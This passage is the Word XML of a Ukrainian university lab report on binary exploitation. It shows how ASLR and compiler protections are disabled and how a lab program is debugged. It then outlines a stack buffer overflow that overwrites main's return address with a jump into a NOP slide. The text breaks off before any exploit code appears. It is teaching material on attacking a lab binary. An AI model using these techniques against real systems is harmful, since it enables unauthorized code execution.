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2C426DF4" w14:textId="77777777" w:rsidR="009E45F4" w:rsidRDefault="00C50939" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50939">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>АНАЛIЗ БIНАРНИХ ВРАЗЛИВОСТЕЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E00C0" w14:textId="6E9DAD82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4096E078" w:rsidR="00A87058" w:rsidRPr="004E74F1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D42A8C">
        <w:t>3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7438ABBE" w14:textId="40DDDDD2" w:rsidR="00D3386D" w:rsidRDefault="00A87058" w:rsidP="00080411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166B87DA" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>Тема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Вибранi методи експлуатацiї.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36477F1A" w14:textId="77777777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t>Мета роботи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Отримати базовi навички розробки, спорядження на налагодження експлоїтiв бiнарних вразливостей у сучасних системах на основi Windows та Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE3D82B" w14:textId="77777777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t>Варіант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9 (18 у списку групи)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA31EC8" w14:textId="77777777" w:rsidR="00080411" w:rsidRDefault="00080411" w:rsidP="00350A27">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C68561F" w14:textId="4136DC08" w:rsidR="00305E66" w:rsidRDefault="005D6CFF" w:rsidP="00EA7F1C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виконання завдань:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0087C" w14:textId="4EAABFFA" w:rsidR="00EA7F1C" w:rsidRDefault="00EA7F1C" w:rsidP="00027943">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="005E3E69" w:rsidRPr="005E3E69">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У Вашому варiантi ЛР 1 видалiть функцiю win(), отримайте шелл у</w:t>
      </w:r>
      <w:r w:rsidR="00A63C71">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E3E69" w:rsidRPr="005E3E69">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>випадку без ASLR, NX</w:t>
      </w:r>
      <w:r w:rsidR="00113201">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20BA1C" w14:textId="6D68B914" w:rsidR="002F594E" w:rsidRPr="005E7E1A" w:rsidRDefault="00436A19" w:rsidP="003B0C4F">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidR="002F594E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C35BEC" w:rsidRPr="005E7E1A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target.c</w:t>
      </w:r>
      <w:r w:rsidR="00C35BEC" w:rsidRPr="005E7E1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F594E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">з ЛР 1 із закоментованою ф. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F594E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidR="002F594E" w:rsidRPr="002F594E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F594E" w:rsidRPr="002F594E">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA2DA4" w14:textId="6CFBFA6C" w:rsidR="003B0C4F" w:rsidRDefault="003B0C4F" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C2E0C5" wp14:editId="58A6B24B">
            <wp:extent cx="6469380" cy="5013058"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="121994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9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8689" cy="50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A40C" w14:textId="15C761D1" w:rsidR="00766503" w:rsidRPr="008928CC" w:rsidRDefault="00766503" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ідключимо </w:t>
      </w:r>
      <w:r w:rsidR="00994667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00994667" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC6D72">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00994667">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidR="00994667" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F30" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F30">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F30" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r w:rsidR="00DB4F30">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00DB4F30" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64)</w:t>
      </w:r>
      <w:r w:rsidR="00994667" w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6AB17E" w14:textId="77777777" w:rsidR="00260E65" w:rsidRPr="000160FF" w:rsidRDefault="00260E65" w:rsidP="00260E65">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randomize</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>va</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09B0BA" w14:textId="77777777" w:rsidR="00260E65" w:rsidRPr="000160FF" w:rsidRDefault="00260E65" w:rsidP="00260E65">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sysctl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel.randomize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_va_space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7035776A" w14:textId="4EB4B066" w:rsidR="004A549A" w:rsidRDefault="00DA3607" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491BE069" wp14:editId="0820A466">
            <wp:extent cx="6645910" cy="867410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="162314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2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D4D9" w14:textId="766F9B48" w:rsidR="00FE4741" w:rsidRPr="00FE4741" w:rsidRDefault="00FE4741" w:rsidP="00416B59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ск</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="001F723E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>пілюємо програму</w:t>
      </w:r>
      <w:r w:rsidR="00130AC3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00587F62" w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00587F62" w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00587F62" w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130AC3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>без будь-яких технологій захисту</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC0171" w14:textId="5E6A2E44" w:rsidR="00416B59" w:rsidRPr="006E0475" w:rsidRDefault="00416B59" w:rsidP="00416B59">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0475">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>$ gcc -no-pie -fno-stack-protector -z execstack -w -g target.c -o target.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A4C7A" w14:textId="4290181A" w:rsidR="00416B59" w:rsidRPr="006E0475" w:rsidRDefault="00416B59" w:rsidP="00416B59">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0475">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>$ checksec --file=target.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA86E3" w14:textId="099337A4" w:rsidR="004A549A" w:rsidRDefault="00AA52DC" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCA42A7" wp14:editId="5B5B6F45">
            <wp:extent cx="6645910" cy="1291590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="188518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4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5EE1" w14:textId="77777777" w:rsidR="004F6F7C" w:rsidRDefault="004F6F7C" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771B43A6" w14:textId="6613BB1D" w:rsidR="00565DC0" w:rsidRPr="004316AE" w:rsidRDefault="004316AE" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дизасемблюємо </w:t>
      </w:r>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4960">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76F136" w14:textId="1B2129CC" w:rsidR="00565DC0" w:rsidRDefault="00565DC0" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="624D493B" wp14:editId="11CF57E0">
            <wp:extent cx="6645910" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="165494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49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AC13" w14:textId="5D62366C" w:rsidR="00565DC0" w:rsidRPr="00296871" w:rsidRDefault="00DC7208" w:rsidP="003B0C4F">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Нас цікавлять</w:t>
      </w:r>
      <w:r w:rsidR="00FC4960">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC4960">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>умов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">а (порівняння </w:t>
      </w:r>
      <w:r w:rsidR="000325B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidRPr="00296871">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">з </w:t>
      </w:r>
      <w:r w:rsidRPr="00296871">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00296871">
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidR="006F42EF" w:rsidRPr="00296871">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FC4960">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r w:rsidR="00296871">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">повернення з функції </w:t>
      </w:r>
      <w:r w:rsidR="00296871">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00296871" w:rsidRPr="00296871">
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF5576" w14:textId="2A4793AE" w:rsidR="00565DC0" w:rsidRPr="00021B15" w:rsidRDefault="001B322F" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Поставимо брейкпоїнти в цих місцях у файлі</w:t>
      </w:r>
      <w:r w:rsidR="00565DC0" w:rsidRPr="001242F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00565DC0" w:rsidRPr="001242F3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>breaks64.gdb</w:t>
      </w:r>
      <w:r w:rsidR="00021B15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC28786" w14:textId="77777777" w:rsidR="00565DC0" w:rsidRPr="00565DC0" w:rsidRDefault="00565DC0" w:rsidP="00565DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565DC0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>br *0x4012f6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F99611" w14:textId="34D5DDF2" w:rsidR="00565DC0" w:rsidRDefault="00565DC0" w:rsidP="00565DC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565DC0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>br *0x40131c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FC9F2" w14:textId="77777777" w:rsidR="00565DC0" w:rsidRDefault="00565DC0" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6DB282" w14:textId="274C6C3B" w:rsidR="006375EB" w:rsidRDefault="005145C8" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Суть експлойту</w:t>
      </w:r>
      <w:r w:rsidR="00640588">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640588" w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task1.</w:t>
      </w:r>
      <w:r w:rsidR="00640588" w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653572D" w14:textId="60E03D03" w:rsidR="00757F87" w:rsidRPr="001E337F" w:rsidRDefault="006375EB" w:rsidP="003B0C4F">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E83161">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D02F0E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Заповнити буфер 8-ма байтами</w:t>
      </w:r>
      <w:r w:rsidR="008175B8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B4C65" w14:textId="4DF9E8BA" w:rsidR="005145C8" w:rsidRDefault="00757F87" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00757F87">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="007A14E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Переповнити буфер, додаючи</w:t>
      </w:r>
      <w:r w:rsidR="0031166A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1337</w:t>
      </w:r>
      <w:r w:rsidR="00E46D15" w:rsidRPr="00553091">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="0031166A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0031166A" w:rsidRPr="00E46D15">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="0031166A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0031166A" w:rsidRPr="00E46D15">
        <w:t>539</w:t>
      </w:r>
      <w:r w:rsidR="00E46D15" w:rsidRPr="00553091">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00E46D15" w:rsidRPr="00E46D15">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E46D15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>щоб задовільнити умову</w:t>
      </w:r>
      <w:r w:rsidR="007A14E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E791E8" w14:textId="13A0FE87" w:rsidR="00E965A3" w:rsidRDefault="007A14E4" w:rsidP="00E965A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перезаписати адресу повернення з ф</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="00695755">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="002B077F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E965A3" w:rsidRPr="002B077F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">таким чином, щоб нова адреса вказувала на середину ланцюжка інструкцій </w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="002B077F">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="002B077F">
        <w:t>" (</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOP</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="005223A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slide</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3" w:rsidRPr="002B077F">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00E965A3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC2570F" w14:textId="47D67608" w:rsidR="004B246E" w:rsidRDefault="008175B8" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Після </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOP</w:t>
      </w:r>
      <w:r w:rsidRPr="008175B8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slide</w:t>
      </w:r>
      <w:r w:rsidRPr="008175B8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003208E0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виконати</w:t>
